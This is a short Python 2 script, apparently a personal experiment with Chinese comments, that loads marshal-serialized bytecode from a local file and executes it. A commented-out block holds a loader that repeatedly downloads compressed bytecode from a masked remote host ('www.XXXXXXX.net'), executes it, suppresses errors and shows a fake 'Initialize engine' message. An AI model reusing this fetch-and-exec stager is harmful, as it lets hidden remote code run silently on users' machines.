#!/usr/local/bin/python
#-*- coding: UTF-8 -*-


##!/usr/bin/env python
#import imp
#if imp.get_magic() != '\x03\xf3\r\n':
#    print "Please update to Python 2.7.3 (http://www.python.org/download/)"
#else:
#    import zlib
#    import marshal
#    import urllib
#    _C = True
#    _U = '777d51faf9e3bb48'
#    _B = 'www.XXXXXXX.net'
#    print "[...] Initialize engine ..."
#    while _C:
#        try:
#            exec marshal.loads(zlib.decompress(urllib.urlopen('http://'+_B+'/static/bin/core').read()))
#        except:
#            pass

import marshal
if __name__=='__main__':
#    script = """print 'hello'"""
#    code = compile(script, "", "exec")  ## 编译为字节代码对象  compile出来之后就是 pyc
#    data = marshal.dumps(code)
#    exec marshal.loads(data)

   # while True:
#        try:
            data = open('123.txt','rb').read()  		#从文件中读取序列化的数据
            #exec marshal.loads(data[8:])   #去掉前8位
            exec marshal.loads(data)
#            exec marshal.loads(input_file)
#            exec(marshal.loads(input_file))
#        except:
#            pass






